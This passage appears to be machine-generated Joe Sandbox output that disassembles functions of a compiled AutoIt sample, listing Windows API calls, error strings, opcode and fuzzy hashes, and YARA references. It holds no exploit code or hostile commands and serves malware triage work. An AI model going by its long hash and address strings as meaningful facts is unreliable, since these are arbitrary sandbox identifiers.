                                                                            • Opcode Fuzzy Hash: ee648b3d59f4a2c5462f85faf473ddf5c181ac6b421fb274c5157ec461609d13
                                                                            • Instruction Fuzzy Hash: 2041F630015105EFDB295F28DC98BB93769FB0A331F188262FD698E1E5CB708C55DB21
                                                                            Function 002829BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00290B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00282A3E,?,00008000), ref: 00290BA7
                                                                              • Part of subcall function 00290284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00282A58,?,00008000), ref: 002902A4
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00282ADF
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00282C2C
                                                                              • Part of subcall function 00283EBE: _wcscpy.LIBCMT ref: 00283EF6
                                                                              • Part of subcall function 0029386D: _iswctype.LIBCMT ref: 00293875
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                            • API String ID: 537147316-3738523708
                                                                            • Opcode ID: 83c13bb7d4fe2c501a3e96d4aa670621171b07dd5aa0a2b9179232c939c39d21
                                                                            • Instruction ID: 74a6a85c2957be95c85c442ea747c82eadcd47f36c2c4170350725968d08acbf
                                                                            • Opcode Fuzzy Hash: 83c13bb7d4fe2c501a3e96d4aa670621171b07dd5aa0a2b9179232c939c39d21
                                                                            • Instruction Fuzzy Hash: E402BD34129341DFC724EF24C991AAFBBE5AF95344F10491EF499932A2DB30DA69CF42
                                                                            Function 00274D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __i64tow__itow__swprintf
                                                                            • String ID: %.15g$0x%p$False$True
                                                                            • API String ID: 421087845-2263619337
                                                                            • Opcode ID: 5e53e0de58b16dacf075be7888e60881af6de9427f2971353563f19f8221f4ec
                                                                            • Instruction ID: 92ce35b23658696bd154be38f795e1155bf3dce968aea6addac7b6038441b385
                                                                            • Opcode Fuzzy Hash: 5e53e0de58b16dacf075be7888e60881af6de9427f2971353563f19f8221f4ec
                                                                            • Instruction Fuzzy Hash: 8841C57163420AAFDB34EF64D842E79B3E8EB45300F20446AE58ED7692EB719961CB11
                                                                            Function 002F7777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002F778F
                                                                            • CreateMenu.USER32 ref: 002F77AA
                                                                            • SetMenu.USER32(?,00000000), ref: 002F77B9
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002F7846
                                                                            • IsMenu.USER32(?), ref: 002F785C
                                                                            • CreatePopupMenu.USER32 ref: 002F7866
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002F7893
                                                                            • DrawMenuBar.USER32 ref: 002F789B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                            • String ID: 0$F
                                                                            • API String ID: 176399719-3044882817
                                                                            • Opcode ID: 873879fd1ebfd9b3eddb532ea405523224e2583624756f61d7ec1ffd597774dd
                                                                            • Instruction ID: 0d2dac71b2f71e58881211ec1d77a7f085420441d58f2deb6efdf3befaa71452
                                                                            • Opcode Fuzzy Hash: 873879fd1ebfd9b3eddb532ea405523224e2583624756f61d7ec1ffd597774dd
                                                                            • Instruction Fuzzy Hash: 24415C74A15209EFEB21DF64D888BAABBF9FF49390F144029FA45A7350D730A920DF50
                                                                            Function 002F7AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002F7B83
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 002F7B8A
                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002F7B9D
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 002F7BA5
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 002F7BB0
                                                                            • DeleteDC.GDI32(00000000), ref: 002F7BB9
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 002F7BC3
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002F7BD7
                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 002F7BE3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                            • String ID: static
                                                                            • API String ID: 2559357485-2160076837
                                                                            • Opcode ID: 9f7d4a47c9758c40b98c6be530f6ae522cda585561fc19ea877efdb7bc691cd2
                                                                            • Instruction ID: d46ad9f2d4dfa785e634711a510fe4bace08d592380ce3404118017b32a76e89
                                                                            • Opcode Fuzzy Hash: 9f7d4a47c9758c40b98c6be530f6ae522cda585561fc19ea877efdb7bc691cd2
                                                                            • Instruction Fuzzy Hash: 0F319E32115219AFDF169F64DC49FEB7B6DFF0A364F110225FA19A21A0CB71D820DBA4
                                                                            Function 00297030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0029706B
                                                                              • Part of subcall function 00298D58: __getptd_noexit.LIBCMT ref: 00298D58
                                                                            • __gmtime64_s.LIBCMT ref: 00297104
                                                                            • __gmtime64_s.LIBCMT ref: 0029713A
                                                                            • __gmtime64_s.LIBCMT ref: 00297157
                                                                            • __allrem.LIBCMT ref: 002971AD
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002971C9
                                                                            • __allrem.LIBCMT ref: 002971E0
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002971FE
                                                                            • __allrem.LIBCMT ref: 00297215
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00297233
                                                                            • __invoke_watson.LIBCMT ref: 002972A4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                            • String ID:
                                                                            • API String ID: 384356119-0
                                                                            • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                            • Instruction ID: b6471888835ad3754bdc48ec8568f8833c084c776775e407f3fd4779bbcc5369
                                                                            • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                            • Instruction Fuzzy Hash: 7B71D871E34717ABDB14DF79CC41B5AB3A9AF51320F14423AF914D7681EB70D9608B90
                                                                            Function 002D2CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002D2CE9
                                                                            • GetMenuItemInfoW.USER32(00337890,000000FF,00000000,00000030), ref: 002D2D4A
                                                                            • SetMenuItemInfoW.USER32(00337890,00000004,00000000,00000030), ref: 002D2D80
                                                                            • Sleep.KERNEL32(000001F4), ref: 002D2D92
                                                                            • GetMenuItemCount.USER32(?), ref: 002D2DD6
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 002D2DF2
                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 002D2E1C
                                                                            • GetMenuItemID.USER32(?,?), ref: 002D2E61
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002D2EA7
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D2EBB
                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D2EDC
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                            • String ID:
                                                                            • API String ID: 4176008265-0
                                                                            • Opcode ID: a8d20859bc6fe3f42c1c2cf92b4eef6ffa5bb30723f09519eb51e0d1c8133647
                                                                            • Instruction ID: 953d758747608d140ecfe43f45eab217b1d6d6ae5198f536851212fd4cf53e93
                                                                            • Opcode Fuzzy Hash: a8d20859bc6fe3f42c1c2cf92b4eef6ffa5bb30723f09519eb51e0d1c8133647
                                                                            • Instruction Fuzzy Hash: C561ADB092024AEFDB25CF64CD88ABEBBB9EB51304F14045BF851A7351D731AD29DB21
                                                                            Function 002F7548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002F75CA
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002F75CD
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 002F75F1
                                                                            • _memset.LIBCMT ref: 002F7602
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002F7614
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002F768C
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 830647256-0
                                                                            • Opcode ID: d835c3d67d47890dfa54c60942ba3964edd0643de435c1a961ad75596138e6dd
                                                                            • Instruction ID: 085bf72528f888507d3bdfba8996992cc62253925b81a6c438b1e9998e6eae5d
                                                                            • Opcode Fuzzy Hash: d835c3d67d47890dfa54c60942ba3964edd0643de435c1a961ad75596138e6dd
                                                                            • Instruction Fuzzy Hash: 05617975914208AFDB21DFA4CC85EFEB7B8EB09750F1001A9FA15AB2A1C770AD51DF60
                                                                            Function 002C77B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002C77DD
                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 002C7836
                                                                            • VariantInit.OLEAUT32(?), ref: 002C7848
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 002C7868
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 002C78BB
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 002C78CF
                                                                            • VariantClear.OLEAUT32(?), ref: 002C78E4
                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 002C78F1
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002C78FA
                                                                            • VariantClear.OLEAUT32(?), ref: 002C790C
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002C7917
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                            • String ID:
                                                                            • API String ID: 2706829360-0
                                                                            • Opcode ID: d1dc0f1682f46c1233f44701b54a0a3f5ef8c72c38cbcee1ec6a25b7b43d7bc3
                                                                            • Instruction ID: 319ed73e761fe1e7eaf77d4b56d9d38f9a1c8fe438a7e8fc58a64c5b8def480b
                                                                            • Opcode Fuzzy Hash: d1dc0f1682f46c1233f44701b54a0a3f5ef8c72c38cbcee1ec6a25b7b43d7bc3
                                                                            • Instruction Fuzzy Hash: E4417335A11219DFCF05DFA5CC98EADBBB8FF08300F008169E955A7261CB30AA55CF90
                                                                            Function 002D0508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 002D0530
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 002D05B1
                                                                            • GetKeyState.USER32(000000A0), ref: 002D05CC
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 002D05E6
                                                                            • GetKeyState.USER32(000000A1), ref: 002D05FB
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 002D0613
                                                                            • GetKeyState.USER32(00000011), ref: 002D0625
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 002D063D
                                                                            • GetKeyState.USER32(00000012), ref: 002D064F
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 002D0667
                                                                            • GetKeyState.USER32(0000005B), ref: 002D0679
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: 0c3d9697c868449abaf199f158529a8314a7b558da14ff7e27983188f9ca4ad4
                                                                            • Instruction ID: 27c7512c7e63e747a44842f094a12a94f91e56d736083d1cb1e0f8a367243ecb
                                                                            • Opcode Fuzzy Hash: 0c3d9697c868449abaf199f158529a8314a7b558da14ff7e27983188f9ca4ad4
                                                                            • Instruction Fuzzy Hash: 3D41E5209147CB6DFF358E6498943B5BEA46B52300F48404BD9C5473D2EAA49DF88FE2
                                                                            Function 002E8AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                            • CoInitialize.OLE32 ref: 002E8AED
                                                                            • CoUninitialize.OLE32 ref: 002E8AF8
                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00303BBC,?), ref: 002E8B58
                                                                            • IIDFromString.OLE32(?,?), ref: 002E8BCB
                                                                            • VariantInit.OLEAUT32(?), ref: 002E8C65
                                                                            • VariantClear.OLEAUT32(?), ref: 002E8CC6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                            • API String ID: 834269672-1287834457
                                                                            • Opcode ID: 14a55b946a5d8ad662c2b65385f97d4283eb1e6fd0909a4c497f661f7f32ad70
                                                                            • Instruction ID: baa0ac74ae0c1710d37fd49dd21578a099be1bea1f2dd66aa69a6d4d494c4830
                                                                            • Opcode Fuzzy Hash: 14a55b946a5d8ad662c2b65385f97d4283eb1e6fd0909a4c497f661f7f32ad70
                                                                            • Instruction Fuzzy Hash: 5A61EE702687519FC715DF11C888F6AB7E8AF45708F50484EF9C99B291CB70ED58CBA2
                                                                            Function 002DBB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 002DBB13
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002DBB89
                                                                            • GetLastError.KERNEL32 ref: 002DBB93
                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 002DBC00
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: 8062656cec10c288ebf38f078a9d428763b8ba245a63b826ead1815b5d15c334
                                                                            • Instruction ID: 0e632d0651427ea9b12cac79e7e778a180f3c769f892ea1259ab1897b649e7f6
                                                                            • Opcode Fuzzy Hash: 8062656cec10c288ebf38f078a9d428763b8ba245a63b826ead1815b5d15c334
                                                                            • Instruction Fuzzy Hash: F931A235A20209DFCB12EF68C865EA9B7B8EF44304F15806BE805E7395DB709D62CB51
                                                                            Function 002D34DD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 82windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 002D357C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoad
                                                                            • String ID: ,z30z3$,z30z3$blank$info$question$stop$warning
                                                                            • API String ID: 2457776203-888455591
                                                                            • Opcode ID: c4aa16fa5655a56d23752b2dd84bbfc46409b488bc2ddd4a7d1cea8e2c364bd0
                                                                            • Instruction ID: 19a5adaf0078ab296bb9867183b27d71f94c17fca4090149da27f6219f21f3a8
                                                                            • Opcode Fuzzy Hash: c4aa16fa5655a56d23752b2dd84bbfc46409b488bc2ddd4a7d1cea8e2c364bd0
                                                                            • Instruction Fuzzy Hash: D4112B7162C357BEEB05CE14FC92DAA779CDF0D760B50001BF50466381E7A47F604AA2
                                                                            Function 002C9B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002CB7BD
                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 002C9BCC
                                                                            • GetDlgCtrlID.USER32 ref: 002C9BD7
                                                                            • GetParent.USER32 ref: 002C9BF3
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 002C9BF6
                                                                            • GetDlgCtrlID.USER32(?), ref: 002C9BFF
                                                                            • GetParent.USER32(?), ref: 002C9C1B
                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 002C9C1E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1536045017-1403004172
                                                                            • Opcode ID: b166a84310746a7216df8ec5b1f9b619260bf74eb14f5b1e545e28a49ea7e23b
                                                                            • Instruction ID: 9fee72b708ed540c6a0b7940de023a85047c3c12b7e9c0fb37d4f5afc4362446
                                                                            • Opcode Fuzzy Hash: b166a84310746a7216df8ec5b1f9b619260bf74eb14f5b1e545e28a49ea7e23b
                                                                            • Instruction Fuzzy Hash: 7C21E074911108BBCF05EB60DC99EFEBBA9EF99300F10021AF861932D1DB754939DB20
                                                                            Function 002C9C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002CB7BD
                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 002C9CB5
